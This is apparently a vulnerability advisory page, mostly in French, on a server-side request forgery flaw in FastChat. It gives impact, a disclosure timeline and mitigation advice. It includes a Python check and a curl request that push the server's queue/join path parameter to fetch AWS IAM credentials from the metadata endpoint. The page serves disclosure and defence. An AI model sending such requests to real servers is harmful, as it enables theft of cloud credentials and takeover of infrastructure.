Vulnérabilité Server-Side Request Forgery dans FastChat

L'exploitation réussie de cette vulnérabilité SSRF permet à un attaquant de forcer le serveur fastchat à effectuer des requêtes vers des destinations arbitraires. Cela peut inclure l'accès à des ressources internes qui ne sont pas directement accessibles depuis l'extérieur, telles que des bases de données, des services d'authentification ou d'autres serveurs internes. Dans le cas spécifique de fastchat, l'attaquant pourrait potentiellement accéder à l'endpoint metadata AWS, ce qui pourrait révéler des informations d'identification sensibles, telles que les clés d'accès AWS, permettant un contrôle total sur l'infrastructure cloud. Cette vulnérabilité est similaire à d'autres attaques SSRF où l'attaquant utilise le serveur vulnérable comme proxy pour accéder à des ressources protégées.

Organizations deploying fastchat for language model serving, particularly those running on AWS infrastructure, are at significant risk. Shared hosting environments where fastchat instances share network access with other tenants are also particularly vulnerable, as a successful SSRF attack could potentially compromise other services on the same host.

• python / server:

import requests
import urllib.parse

def check_ssrf(url):
    try:
        parsed_url = urllib.parse.urlparse(url)
        if parsed_url.scheme in ('http', 'https'):
            response = requests.get(url, timeout=5)
            print(f"URL: {url}, Status Code: {response.status_code}")
        else:
            print(f"Invalid URL scheme: {url}")
    except requests.exceptions.RequestException as e:
        print(f"Error accessing {url}: {e}")

# Example usage - check AWS metadata endpoint
check_ssrf('http://169.254.169.254/latest/meta-data/iam/security-credentials/')

• generic web:

curl -I 'http://your-fastchat-server/queue/join?path=http://169.254.169.254/latest/meta-data/iam/security-credentials/'

1. 2025-03-20Disclosure

   disclosure

1. Réservé2024-11-21
2. Publiée2025-03-20
3. Modifiée2025-03-21
4. EPSS mis à jour2026-04-02

La mitigation principale consiste à mettre à jour fastchat vers une version corrigée dès que possible. En attendant la mise à jour, plusieurs mesures peuvent être prises pour atténuer le risque. Il est crucial de valider rigoureusement toutes les entrées utilisateur, en particulier les paramètres de chemin d'URL, pour empêcher l'injection de requêtes malveillantes. L'implémentation d'une liste blanche des domaines autorisés pour les requêtes sortantes peut également limiter l'impact potentiel de l'exploitation. De plus, l'utilisation d'un pare-feu d'application web (WAF) configuré pour bloquer les requêtes SSRF peut fournir une couche de protection supplémentaire. Enfin, surveillez attentivement les journaux d'accès et d'erreur pour détecter toute activité suspecte.